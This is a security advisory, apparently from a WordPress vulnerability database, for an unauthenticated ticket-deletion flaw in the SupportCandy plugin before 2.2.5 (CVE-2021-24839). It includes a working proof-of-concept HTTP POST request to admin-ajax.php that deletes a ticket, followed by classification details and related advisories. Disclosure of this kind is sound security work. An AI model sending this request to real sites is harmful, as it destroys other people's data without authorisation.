SupportCandy < 2.2.5 – Unauthenticated Arbitrary Ticket Deletion | CVE 2021-24839 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CRSF checks in its wpsc_tickets AJAX action, which could allow unauthenticated users to call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action. Other actions may be affected as well.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close

action=wpsc_tickets&setting_action=set_delete_permanently_bulk_ticket&ticket_id=3

Affects Plugins

Fixed in 2.2.5

References

CVE

YouTube Video

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

5e6e63c2-2675-4b8d-9b94-c16c525a1a0e

Timeline

Publicly Published

2022-01-05 (about 3 years ago)

Added

2022-01-05 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2021-10-05

Title

Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts

Published

2020-08-21

Title

Contact Form - Form builder by Kali Forms < 2.1.2 - Unauthenticated Arbitrary Post Deletion

Published

2021-04-06

Title

WPBakery Page Builder Clipboard < 4.5.8 - Unauthorised Arbitrary License Options Update

Published

2021-01-28

Title

uListing < 1.7 - Unauthenticated Arbitrary Account Creation

Published

2021-09-06

Title

Pinterest Automatic < 4.14.4 - Unauthenticated Arbitrary Options Update